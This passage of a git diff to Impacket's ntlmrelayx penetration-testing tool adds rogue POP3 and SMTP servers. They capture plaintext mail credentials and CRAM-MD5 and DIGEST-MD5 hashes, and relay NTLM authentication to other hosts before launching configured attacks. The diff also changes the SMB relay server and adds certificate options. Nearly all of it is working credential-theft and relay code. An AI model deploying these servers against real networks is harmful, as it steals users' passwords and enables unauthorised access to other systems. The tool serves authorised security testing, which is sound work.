base64.b64decode(type1_data.decode('latin-1', errors="ignore").strip()) + # Verify NTLMSSP signature + if negotiate_msg[0:8] != b'NTLMSSP\x00': + return False + + # Relay to gain challenge + challenge = self.do_ntlm_negotiate(negotiate_msg) + if challenge is None: + LOG.error(f"(POP3) Error when relay NTLM Type 2 message to client ") + return False + + response = "+ %s\r\n" % base64.b64encode(challenge.getData()).decode('latin-1') + self.request.send(response.encode('latin-1')) + + authenticate_message = self.request.recv(4096) + if not authenticate_message: + return False + + auth_decoded = authenticate_message.decode('latin-1', errors='ignore').strip() + + if auth_decoded == '*' or auth_decoded == '': + LOG.error(f'(POP3) Client cancelled NTLM authentication') + self.send_err("AUTHENTICATE cancelled") + return False + + if not all(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n' for c in auth_decoded): + self.send_err("AUTHENTICATE failed") + return False + + try: + auth_data = base64.b64decode(auth_decoded) + except Exception as e: + self.send_err("AUTHENTICATE failed") + return False + + authenticateMessage = self.do_ntlm_auth(auth_data) + if authenticateMessage is None: + # Authentication failed + self.send_err("AUTHENTICATE failed") # Fix here! + LOG.error(f"(POP3) Authenticating against {self.target.scheme}://{self.target.netloc} FAILED") + return False + # relay worked, do whatever we want + self.send_err("AUTHENTICATE Relayed by Impacket") + self.client.setClientId() + if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE: + LOG.info("(POP3): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + else: + LOG.info("(POP3): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('ascii'), authenticateMessage['user_name'].decode('ascii'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + + ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], + authenticateMessage['lanman'], authenticateMessage['ntlm']) + self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.config.dumpHashes is True: + LOG.info("(POP3): %s" % ntlm_hash_data['hash_string']) + + if self.server.config.outputFile is not None: + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.config.outputFile) + + self.server.config.target.registerTarget(self.target, True, self.authUser) + + self.do_attack() + return True + except Exception as e: + LOG.error(f"(POP3) Error when handle NTLM Auth: {e}") + traceback.print_exc() + return False + + def do_ntlm_negotiate(self, token: bytes) -> bytes | None: + self.client = self.server.config.protocolClients[self.target.scheme.upper()](self.server.config, self.target) + # If connection failed -> return False + if not self.client.initConnection(): + return None + self.challengeMessage = self.client.sendNegotiate(token) + if self.server.config.remove_target: + av_pairs = ntlm.AV_PAIRS(self.challengeMessage['TargetInfoFields']) + del av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] + self.challengeMessage['TargetInfoFields'] = av_pairs.getData() + self.challengeMessage['TargetInfoFields_len'] = len(av_pairs.getData()) + self.challengeMessage['TargetInfoFields_max_len'] = len(av_pairs.getData()) + + if self.challengeMessage is False: + return None + return self.challengeMessage + + def do_ntlm_auth(self, token: bytes) -> bytes | None: + self.authenticateMessage = ntlm.NTLMAuthChallengeResponse() + self.authenticateMessage.fromString(token) + self.authUser = self.authenticateMessage.getUserString() + if self.authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1': + clientResponse, errorCode = self.client.sendAuth(token) + else: + # Anonymous login send STATUS_ACCESS_DENIED so we force the client to send his credentials, except when coming from localhost + errorCode = STATUS_ACCESS_DENIED + if errorCode == STATUS_SUCCESS: + return self.authenticateMessage + return None + + def do_attack(self): + # Check if SOCKS is enabled and if we support the target scheme + if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes: + # Pass all the data to the socksplugins proxy + activeConnections.put((self.target.hostname, self.client.targetPort, self.target.scheme.upper(), + self.authUser, self.client, self.client.sessionData)) + return + + # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks + if self.target.scheme.upper() in self.server.config.attacks: + # We have an attack.. go for it + clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session, + self.authUser, self.target, self.client) + clientThread.start() + else: + LOG.error('(POP3): No attack configured for %s' % self.target.scheme.upper()) + + def SendPacketAndRead(self): + self.request.send(f"+OK\r\n".encode('latin-1')) + return self.request.recv(2048) + + def handle(self): + try: + # Generate challenge for APOP + challenge = self.generate_challenge() + + # Send banner with challenge for APOP support + banner = "+OK POP3 Impacket server ready %s\r\n" % challenge + self.request.send(banner.encode('latin-1')) + + while True: + # Read first command + data = self.request.recv(1024) + print("Command is:", data) + + # Handle CAPA (capability) command + if data[0:4].upper() == b'CAPA': + # Advertise supported auth methods + capabilities = [ + "+OK Capability list follows", + "USER", "STLS", + "SASL PLAIN LOGIN CRAM-MD5 NTLM", + "IMPLEMENTATION IMPACKET POP3", + "." + ] + self.request.send("\r\n".join(capabilities).encode('latin-1') + b"\r\n") + data = self.request.recv(1024) + + # Handle STARTTLS command + if data[0:4].upper() == b'STLS': + self.request.send("+OK Begin TLS negotiation\r\n".encode('latin-1')) + if not self.upgrade_to_tls(): + # TLS upgrade failed, closed connection + return + + # Handle AUTH command + if data[0:4].upper() == b'AUTH': + mechanism = data[5:].strip().upper() + + if mechanism == b'PLAIN': + self.handle_auth_plain(data) + self.send_err("Authentication captured by Impacket") + return + + elif mechanism == b'LOGIN': + self.handle_auth_login(data) + self.send_err("Authentication captured by Impacket") + return + + elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'): + self.handle_auth_cram_md5(data) + self.send_err("Authentication captured by Impacket") + return + + elif mechanism == b'NTLM': + if self.handle_auth_ntlm(data): + self.send_err("Authentication successfully relayed by Impacket") + else: + self.send_err("Authentication failed") + return + + elif not mechanism: + # AUTH without mechanism - list supported + auth_list = "+OK Supported mechanisms:\r\nPLAIN\r\nLOGIN\r\nCRAM-MD5\r\nNTLM\r\n.\r\n" + self.request.send(auth_list.encode('latin-1')) + data = self.request.recv(1024) + else: + self.send_err("Unsupported authentication method") + return + + # Handle APOP command + if data[0:4].upper() == b'APOP': + if self.handle_apop(data): + self.send_err("Authentication captured by Impacket") + else: + self.send_err("Authentication failed") + return + + # Handle traditional USER/PASS + if data[0:4].upper() == b'USER': + User = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore') + self.send_ok("Password required") + data = self.request.recv(1024) + + if data[0:4].upper() == b'PASS': + Pass = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore') + + LOG.info(f"(POP3) Captured USER authentication from {self.client_address[0]}. {User} : {Pass}") + self.send_err("Authentication captured by Impacket") + return + + self.send_err("Unknown command") + except Exception as e: + LOG.error(f"Error when handle command: {e}") + +class POP3RelayServer(Thread): + + def __init__(self, config): + Thread.__init__(self) + self.daemon = True + self.config = config + self.server = None + + def run(self): + + if self.config.listeningPort: + pop3port = self.config.listeningPort + else: + pop3port = 110 + + LOG.info("Setting up POP3 Server on port " + str(pop3port)) + + # changed to read from the interfaceIP set in the configuration + self.server = POP3Server((self.config.interfaceIp, pop3port), POP3Handler, self.config) + + try: + self.server.serve_forever() + except KeyboardInterrupt: + pass + LOG.info('Shutting down POP3 Server') + self.server.server_close() \ No newline at end of file diff --git a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py index 086b8cc039..c76dc33b81 100644 --- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py +++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py @@ -687,7 +687,8 @@ def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): # Done with the relay for now. connData['Authenticated'] = True - connData['relayToHost'] = False + if 'relayToHost' in connData: + del(connData['relayToHost']) # Status SUCCESS errorCode = STATUS_SUCCESS @@ -704,6 +705,7 @@ def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): else: # Process Standard Security #TODO: Fix this for other protocols than SMB [!] + LOG.debug("(SMB) Process standatd Security authentication") respParameters = smb.SMBSessionSetupAndXResponse_Parameters() respData = smb.SMBSessionSetupAndXResponse_Data() sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters']) @@ -711,6 +713,7 @@ def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] sessionSetupData.fromString(SMBCommand['Data']) + connData['Capabilities'] = sessionSetupParameters['Capabilities'] client = connData['SMBClient'] _, errorCode = client.sendStandardSecurityAuth(sessionSetupData) @@ -780,13 +783,13 @@ def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket): authenticateMessage = connData['AUTHENTICATE_MESSAGE'] self.authUser = authenticateMessage.getUserString() - if self.config.disableMulti: - return self.origsmbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket) + # if self.config.disableMulti: + # return self.smbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket) # Uncommenting this will stop at the first connection relayed and won't relaying until all targets # are processed. There might be a use case for this - #if 'relayToHost' in connData: - # # Connection already relayed, let's just answer the request (that will return object not found) - # return self.smbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket) + if 'relayToHost' in connData: + # Connection already relayed, let's just answer the request (that will return object not found) + return self.smbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket) try: if self.config.mode.upper () == 'REFLECTION': @@ -800,7 +803,7 @@ def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket): else: # No more targets to process, just let the victim to fail later LOG.info('(SMB): Connection from %s@%s controlled, but there are no more targets left!' % (self.authUser, connData['ClientIP'])) - return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket) + return self.origsmbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket) LOG.info('(SMB): Connection from %s@%s controlled, attacking target %s://%s' % (self.authUser, connData['ClientIP'], self.target.scheme, self.target.netloc)) diff --git a/impacket/examples/ntlmrelayx/servers/smtprelayserver.py b/impacket/examples/ntlmrelayx/servers/smtprelayserver.py new file mode 100644 index 0000000000..7011c11530 --- /dev/null +++ b/impacket/examples/ntlmrelayx/servers/smtprelayserver.py @@ -0,0 +1,559 @@ +from threading import Thread +import socketserver + +from impacket import LOG, ntlm +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections +from impacket.examples.utils import get_address +from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig +from impacket.examples.ntlmrelayx.utils.ssl import generate_self_signed_certificate, sni_callback +from OpenSSL import SSL, crypto +import socket +import re +import base64 +import hashlib +import time +from typing import List + + +class SMTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): + def __init__(self, server_address, RequestHandlerClass, config: NTLMRelayxConfig): + self.config = config + self.self_signed_certificate = False + if self.config.smtp_server_cert and self.config.smtp_server_key: + try: + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, self.config.smtp_server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, self.config.smtp_server_key) + except Exception as e: + LOG.error(f"(SMTP): Unable to load cert chain from files: {e}") + exit(1) + else: + LOG.warning("(SMTP) Generating self-signed certificate") + server_cert, server_key = generate_self_signed_certificate() + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, server_key) + self.self_signed_certificate = True + self.daemon_threads = True + self.address_family, self.server_address = get_address(server_address[0], server_address[1], self.config.ipv6) + socketserver.TCPServer.allow_reuse_address = True + socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass) + +class SMTPHandler(socketserver.BaseRequestHandler): + def __init__(self, request: socket.socket, client_address, server): + self.server = server + self.challengeMessage = None + self.client = None + self.machineAccount = None + self.machineHashes = None + self.domainIp = None + self.authUser = None + + if self.server.config.target is None: + # Reflection mode, defaults to SMB at the target, for now + self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0]) + self.target = self.server.config.target.getTarget() + if self.target is None: + LOG.info("(SMTP): Received connection from %s, but there are no more targets left!" % client_address[0]) + return + + LOG.info("(SMTP): Received connection from %s, attacking target %s://%s" % (client_address[0] ,self.target.scheme, self.target.netloc)) + + super().__init__(request, client_address, server) + + def send_response(self, code: int, message: str) -> None: + """Send SMTP response""" + response = "%d %s\r\n" % (code, message) + self.request.send(response.encode('latin-1')) + + def send_multiline_response(self, code: str, lines: List[str]) -> None: + """Send multi-line SMTP response""" + for i, line in enumerate(lines): + if i < len(lines) - 1: + response = "%d-%s\r\n" % (code, line) + else: + response = "%d %s\r\n" % (code, line) + self.request.send(response.encode('latin-1')) + + def send_continue(self, data: str=""): + """Send continuation response for AUTH""" + if data: + response = "334 %s\r\n" % data + else: + response = "334\r\n" + self.request.send(response.encode('latin-1')) + + def upgrade_to_tls(self): + """Upgrade connection to TLS using Responder's SSL certificates""" + try: + # Create SSL context + context = SSL.Context(SSL.SSLv23_METHOD) + context.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3) + context.use_certificate(self.server.server_cert) + context.use_privatekey(self.server.server_key) + if self.self_signed_certificate: + context.sni_callback = sni_callback + connection = SSL.Connection(context, self.request) + connection.set_accept_state() + connection.do_handshake() + + # Wrap socket + self.request = connection + + LOG.info(f"(SMTP): Successfully upgraded to TLS from {self.client_address[0]}") + return True + + except Exception as e: + LOG.error(f"(SMTP): TLS upgrade failed: {e}") + return False + + def handle_auth_plain(self, data): + """Handle AUTH PLAIN""" + try: + # AUTH PLAIN can be: + # AUTH PLAIN + # or + # AUTH PLAIN + # + + auth_match = re.search(b'AUTH PLAIN (.+)', data, re.IGNORECASE) + + if auth_match: + # Inline format + auth_data = auth_match.group(1).strip() + else: + # Need to read next line + self.send_continue() + auth_data = self.request.recv(1024).strip() + + if not auth_data or auth_data == b'*': + return False + + # Decode + decoded = base64.b64decode(auth_data) + # Format: [authzid]\x00username\x00password + parts = decoded.split(b'\x00') + + if len(parts) >= 3: + username = parts[1].decode('latin-1', errors='ignore') + password = parts[2].decode('latin-1', errors='ignore') + elif len(parts) == 2: + username = parts[0].decode('latin-1', errors='ignore') + password = parts[1].decode('latin-1', errors='ignore') + else: + return False + + LOG.info(f"(SMTP) gained plain auth message from {self.client_address[0]}, received credentials: {username} : {password}") + return True + except Exception as e: + LOG.error(f"Error parsing AUTH PLAIN message: {e}. String: {data}") + return False + + def handle_auth_login(self, data): + """Handle AUTH LOGIN (two-stage)""" + username = None + password = None + try: + # Check if username is inline + auth_match = re.search(b'AUTH LOGIN (.+)', data, re.IGNORECASE) + + if auth_match: + # Username provided inline + username_b64 = auth_match.group(1).strip() + username = base64.b64decode(username_b64).decode('latin-1', errors='ignore') + else: + # Prompt for username + self.send_continue(base64.b64encode(b"Username:").decode('latin-1')) + username_b64 = self.request.recv(1024).strip() + + if not username_b64 or username_b64 == b'*': + return False + + username = base64.b64decode(username_b64).decode('latin-1', errors='ignore') + + # Prompt for password + self.send_continue(base64.b64encode(b"Password:").decode('latin-1')) + password_b64 = self.request.recv(1024).strip() + + if not password_b64 or password_b64 == b'*': + return False + + password = base64.b64decode(password_b64).decode('latin-1', errors='ignore') + + LOG.info(f"(SMTP): Captured AUTH LOGIN credentials from {self.client_address[0]}. {username} : {password}") + return True + except Exception as e: + LOG.error(f"Exception when AUTH LOGIN message: {e}. Login: {username}, Password: {password}") + return False + + def handle_auth_cram_md5(self, data): + """Handle AUTH CRAM-MD5 (challenge-response)""" + try: + import time + import os + + # Generate challenge + challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), "IMPACKETMACHINE") + challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1') + + # Send challenge + self.send_continue(challenge_b64) + + # Receive response + response_b64 = self.request.recv(1024).strip() + + if not response_b64 or response_b64 == b'*': + return False + + response = base64.b64decode(response_b64).decode('latin-1', errors='ignore') + # Format: usernamedigest + parts = response.split(' ', 1) + + if len(parts) < 2: + return False + + username = parts[0] + digest = parts[1].lower() + + # Format for hashcat + hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest) + + LOG.info(f"(SMTP): Captured CRAM-MD5 hash from {self.client_address[0]}: {hash_string}") + + return True + except Exception as e: + LOG.error(f"(SMTP): Error parsing CRAM-MD5: {e}") + return False + + def handle_auth_digest_md5(self, data): + """Handle AUTH DIGEST-MD5""" + try: + # Generate nonce + nonce = hashlib.md5(str(time.time()).encode()).hexdigest() + + # Build challenge + challenge_parts = [ + 'realm="%s"' % "IMPACKETMACHINE", + 'nonce="%s"' % nonce, + 'qop="auth"', + 'charset=utf-8', + 'algorithm=md5-sess' + ] + challenge = ','.join(challenge_parts) + challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1') + + # Send challenge + self.send_continue(challenge_b64) + + # Receive response + response_b64 = self.request.recv(1024).strip() + + if not response_b64 or response_b64 == b'*': + return False + + response = base64.b64decode(response_b64).decode('latin-1', errors='ignore') + + # Parse response + username_match = re.search(r'username="([^"]+)"', response) + realm_match = re.search(r'realm="([^"]+)"', response) + nonce_match = re.search(r'nonce="([^"]+)"', response) + cnonce_match = re.search(r'cnonce="([^"]+)"', response) + nc_match = re.search(r'nc=([0-9a-fA-F]+)', response) + qop_match = re.search(r'qop=([a-z\-]+)', response) + uri_match = re.search(r'digest-uri="([^"]+)"', response) + response_match = re.search(r'response=([0-9a-fA-F]+)', response) + + if not username_match or not response_match: + return False + + username = username_match.group(1) + realm = realm_match.group(1) if realm_match else '' + resp_nonce = nonce_match.group(1) if nonce_match else '' + cnonce = cnonce_match.group(1) if cnonce_match else '' + nc = nc_match.group(1) if nc_match else '' + qop = qop_match.group(1) if qop_match else '' + uri = uri_match.group(1) if uri_match else '' + resp_hash = response_match.group(1) + + # Format for hashcat/john + hash_string = "%s:$sasl$DIGEST-MD5$%s$%s$%s$%s$%s$%s$%s" % ( + username, realm, nonce, cnonce, nc, qop, uri, resp_hash + ) + LOG.info(f"(SMTP) Captured Digest-MD5 hash from {self.client_address[0]} for user {username}: {hash_string}") + + # Send rspauth (expected by some clients) + rspauth = 'rspauth=' + resp_hash + self.send_continue(base64.b64encode(rspauth.encode('latin-1')).decode('latin-1')) + + # Client should send empty line + self.request.recv(1024) + + return True + except Exception as e: + LOG.error('(SMTP) Error parsing DIGEST-MD5: %s' % str(e)) + return False + + def handle_auth_ntlm(self, data): + """Handle AUTH NTLM with proper Type 2 challenge""" + try: + # Check for inline NTLM NEGOTIATE + auth_match = re.search(b'AUTH NTLM (.+)', data, re.IGNORECASE) + + if auth_match: + negotiate_b64 = auth_match.group(1).strip() + else: + # Send empty continuation + self.send_continue() + negotiate_b64 = self.request.recv(1024).strip() + + if not negotiate_b64 or negotiate_b64 == b'*': + return False + + negotiate = base64.b64decode(negotiate_b64) + + # Verify NTLMSSP signature + if negotiate[0:8] != b'NTLMSSP\x00': + return False + + # Relay challenge + challenge = self.do_ntlm_negotiate(negotiate) + if challenge is None: + LOG.error(f"(SMTP) Error when relay NTLM Type 2 message to client ") + return False + + challenge_b64 = base64.b64encode(challenge.getData()).decode('latin-1') + + # Send challenge + self.send_continue(challenge_b64) + + # Receive NTLMSSP AUTH (Type 3) from client + auth_b64 = self.request.recv(2048).strip() + + if not auth_b64 or auth_b64 == b'*': + return False + + auth_data = base64.b64decode(auth_b64) + + # Relay Type 3 packet to client + authenticateMessage = self.do_ntlm_auth(auth_data) + if authenticateMessage is None: + # Authentication failed + self.send_response(503, "Authentication failed") + if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE: + LOG.error("(SMTP): Authenticating against %s://%s as %s\\%s FAILED" % ( + self.target.scheme, self.target.netloc, + authenticateMessage['domain_name'].decode('utf-16le'), + authenticateMessage['user_name'].decode('utf-16le'))) + else: + LOG.error("(SMTP): Authenticating against %s://%s as %s\\%s FAILED" % ( + self.target.scheme, self.target.netloc, + authenticateMessage['domain_name'].decode('ascii'), + authenticateMessage['user_name'].decode('ascii'))) + return False + # relay worked, do whatever we want + self.send_response(503, "Authentication successful relayed by Impacket") + self.client.setClientId() + if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE: + LOG.info("(SMTP): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + else: + LOG.info("(SMTP): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('ascii'), authenticateMessage['user_name'].decode('ascii'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + + ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], + authenticateMessage['lanman'], authenticateMessage['ntlm']) + self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.config.dumpHashes is True: + LOG.info("(SMTP): %s" % ntlm_hash_data['hash_string']) + + if self.server.config.outputFile is not None: + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.config.outputFile) + + self.server.config.target.registerTarget(self.target, True, self.authUser) + + self.do_attack() + return True + + except Exception as e: + LOG.error('[SMTP] Error parsing NTLM: %s' % str(e)) + return False + + def do_ntlm_negotiate(self, token: bytes) -> bytes | None: + self.client = self.server.config.protocolClients[self.target.scheme.upper()](self.server.config, self.target) + # If connection failed -> return False + if not self.client.initConnection(): + return None + self.challengeMessage = self.client.sendNegotiate(token) + if self.server.config.remove_target: + av_pairs = ntlm.AV_PAIRS(self.challengeMessage['TargetInfoFields']) + del av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] + self.challengeMessage['TargetInfoFields'] = av_pairs.getData() + self.challengeMessage['TargetInfoFields_len'] = len(av_pairs.getData()) + self.challengeMessage['TargetInfoFields_max_len'] = len(av_pairs.getData()) + + if self.challengeMessage is False: + return None + return self.challengeMessage + + def do_ntlm_auth(self, token: bytes) -> bytes | None: + self.authenticateMessage = ntlm.NTLMAuthChallengeResponse() + self.authenticateMessage.fromString(token) + self.authUser = self.authenticateMessage.getUserString() + if self.authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1': + clientResponse, errorCode = self.client.sendAuth(token) + else: + # Anonymous login send STATUS_ACCESS_DENIED so we force the client to send his credentials, except when coming from localhost + errorCode = STATUS_ACCESS_DENIED + if errorCode == STATUS_SUCCESS: + return self.authenticateMessage + return None + + def do_attack(self): + # Check if SOCKS is enabled and if we support the target scheme + if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes: + # Pass all the data to the socksplugins proxy + activeConnections.put((self.target.hostname, self.client.targetPort, self.target.scheme.upper(), + self.authUser, self.client, self.client.sessionData)) + return + + # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks + if self.target.scheme.upper() in self.server.config.attacks: + # We have an attack.. go for it + clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session, + self.authUser, self.target, self.client) + clientThread.start() + else: + LOG.error('(SMTP): No attack configured for %s' % self.target.scheme.upper()) + + def handle(self): + # try: + # Send greeting + self.request.send(b"220\x20IMPACKETSMTP ESMTP\x0d\x0a") + data = self.request.recv(1024) + + # Handle EHLO + if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO': + # Send ESMTP capabilities + capabilities = [ + "IMPACKETMACHINE Hello", + "STARTTLS", + "AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM", + "SIZE 35651584", + "8BITMIME", + "PIPELINING", + "ENHANCEDSTATUSCODES" + ] + self.send_multiline_response(250, capabilities) + data = self.request.recv(1024) + + # Handle STARTTLS command + if data[0:8].upper() == b'STARTTLS': + self.send_response(220, "Ready to start TLS") + + # Upgrade to TLS + if self.upgrade_to_tls(): + # After successful TLS upgrade, client will send EHLO again + data = self.request.recv(1024) + + # Handle EHLO after STARTTLS + if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO': + # Send capabilities again (without STARTTLS this time) + capabilities = [ + "IMPACKETMACHINE Hello", + "AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM", + "SIZE 35651584", + "8BITMIME", + "PIPELINING", + "ENHANCEDSTATUSCODES" + ] + self.send_multiline_response(250, capabilities) + data = self.request.recv(1024) + else: + # TLS upgrade failed + try: + self.send_response(454, "TLS not available") + except: + pass + return + + # Handle AUTH command + if data[0:4].upper() == b'AUTH': + mechanism = data[5:].strip().split(b' ')[0].upper() + + if mechanism == b'PLAIN': + if self.handle_auth_plain(data): + self.send_response(235, "Authentication successful") + else: + self.send_response(535, "Authentication failed") + return + + elif mechanism == b'LOGIN': + if self.handle_auth_login(data): + self.send_response(235, "Authentication successful") + else: + self.send_response(535, "Authentication failed") + return + + elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'): + if self.handle_auth_cram_md5(data): + self.send_response(235, "Authentication successful") + else: + self.send_response(535, "Authentication failed") + return + + elif mechanism == b'DIGEST-MD5' or mechanism.startswith(b'DIGEST'): + if self.handle_auth_digest_md5(data): + self.send_response(235, "Authentication successful") + else: + self.send_response(535, "Authentication failed") + return + + elif mechanism == b'NTLM': + if self.handle_auth_ntlm(data): + self.send_response(235, "Authentication successful") + else: + self.send_response(535, "Authentication failed") + return + + else: + self.send_response(504, "Unrecognized authentication type") + return + + if data.upper().startswith(b"MAIL FROM"): + self.send_response(530, "5.7.0 Authentication required") + return + + # Handle other commands + self.send_response(250, "OK") + + +class SMTPRelayServer(Thread): + def __init__(self, config): + Thread.__init__(self) + self.daemon = True + self.config = config + self.server = None + + def run(self): + + if self.config.listeningPort: + smtpport = self.config.listeningPort + else: + smtpport = 25 + + LOG.info("Setting up SMTP Server on port " + str(smtpport)) + + # changed to read from the interfaceIP set in the configuration + self.server = SMTPServer((self.config.interfaceIp, smtpport), SMTPHandler, self.config) + + try: + self.server.serve_forever() + except KeyboardInterrupt: + pass + LOG.info('Shutting down SMTP Server') + self.server.server_close() \ No newline at end of file diff --git a/impacket/examples/ntlmrelayx/utils/config.py b/impacket/examples/ntlmrelayx/utils/config.py index 753cc762cb..7c4b7d2d7b 100644 --- a/impacket/examples/ntlmrelayx/utils/config.py +++ b/impacket/examples/ntlmrelayx/utils/config.py @@ -18,6 +18,8 @@ # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) # from impacket.examples.utils import parse_credentials +from pathlib import Path +from impacket import LOG class NTLMRelayxConfig: @@ -96,6 +98,14 @@ def __init__(self): # WebDAV options self.serve_image = False + # Mail (SMTP, IMAP, POP3) options + self.smtp_server_cert: str | None = None + self.smtp_server_key: str | None = None + self.imap_server_cert: str | None = None + self.imap_server_key: str | None = None + self.pop3_server_cert: str | None = None + self.pop3_server_key: str | None = None + # AD CS attack options self.isADCSAttack = False self.template = None @@ -283,6 +293,55 @@ def setMSSQLDb(self, mssql_db): def setAltName(self, altName): self.altName = altName + + def set_smtp_server_cert(self, smtp_server_path: Path): + try: + with open(smtp_server_path, 'rb') as f: + self.smtp_server_cert = f.read().strip() + except FileNotFoundError: + LOG.error("(SMTP) Certificate file not found") + exit(1) + + def set_smtp_server_key(self, smtp_server_key_path: Path): + try: + with open(smtp_server_key_path, 'rb') as f: + self.smtp_server_key = f.read().strip() + except FileNotFoundError: + LOG.error("(SMTP) Private key file not found") + exit(1) + + def set_imap_server_cert(self, imap_server_path: Path): + try: + with open(imap_server_path, 'rb') as f: + self.imap_server_cert = f.read().strip() + except FileNotFoundError: + LOG.error("(IMAP) Certificate file not found") + exit(1) + + def set_imap_server_key(self, imap_server_key_path: Path): + try: + with open(imap_server_key_path, 'rb') as f: + self.imap_server_key = f.read().strip() + except FileNotFoundError: + LOG.error("(IMAP) Private key file not found") + exit(1) + + def set_pop3_server_cert(self, pop3_server_path: Path): + try: + with open(pop3_server_path, 'rb') as f: + self.pop3_server_cert = f.read().strip() + except FileNotFoundError: + LOG.error("(POP3) Certificate file not found") + exit(1) + + def set_pop3_server_key(self, pop3_server_key_path: Path): + try: + with open(pop3_server_key_path, 'rb') as f: + self.pop3_server_key = f.read().strip() + except FileNotFoundError: + LOG.error("(POP3) Private key file not found") + exit(1) + def parse_listening_ports(value): ports = set() diff --git a/impacket/examples/ntlmrelayx/utils/ssl.py b/impacket/examples/ntlmrelayx/utils/ssl.py index cbd9f6a3ad..991a0cd0fc 100644 --- a/impacket/examples/ntlmrelayx/utils/ssl.py +++ b/impacket/examples/ntlmrelayx/utils/ssl.py @@ -26,6 +26,16 @@ # from OpenSSL import crypto, SSL from impacket import LOG +from typing import Tuple, Optional +import ipaddress +import socket +from ssl import SSLSocket +from cryptography import x509 +from cryptography.x509.oid import NameOID, ExtensionOID +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import rsa +import datetime +import ssl # This certificate is not supposed to be exposed on the network # but only used for the local SOCKS plugins @@ -73,3 +83,105 @@ def wrapClientConnection(self, cert='/tmp/impacket.crt'): # Now set this property back to the SSL socket instead of the regular one self.socksSocket = sslSocket + + + +def sni_callback(ssl_sock: SSLSocket, + sni_name: 